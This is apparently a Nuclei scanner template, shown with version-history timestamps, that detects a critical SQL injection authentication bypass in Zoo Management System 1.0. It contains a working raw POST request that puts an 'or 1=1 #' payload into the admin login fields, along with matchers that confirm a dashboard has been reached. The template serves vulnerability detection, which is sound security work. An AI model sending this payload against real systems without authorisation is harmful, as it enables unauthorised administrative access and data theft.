2020-10-15 19:30:42 +00:00
id : zms-auth-bypass
info :
2022-09-29 13:38:41 +00:00
name : Zoo Management System 1.0 - SQL Injection
2020-10-15 19:30:42 +00:00
author : dwisiswant0
2022-09-29 13:38:41 +00:00
severity : critical
description : Zoo Management System 1.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/48880
2022-09-29 13:38:41 +00:00
- https://packetstormsecurity.com/files/159567/Zoo-Management-System-1.0-SQL-Injection.html
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2022-09-29 13:52:24 +00:00
tags : edb,auth-bypass,packetstorm,zms
2020-10-15 19:30:42 +00:00
requests :
- raw :
- |
POST /zms/admin/index.php HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type : application/x-www-form-urlencoded
2021-09-08 12:17:19 +00:00
Origin : {{BaseURL}}
Referer : {{BaseURL}}/zms/admin/index.php
Cookie : PHPSESSID={{randstr}}
2020-10-15 19:30:42 +00:00
username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=
2022-10-07 21:27:25 +00:00
host-redirects : true
2020-10-15 19:30:42 +00:00
max-redirects : 1
matchers-condition : and
matchers :
- type : regex
regex :
- "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)"
2020-10-15 19:32:52 +00:00
- "ZMS ADMIN"
2020-10-15 19:30:42 +00:00
condition : and
part : body
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28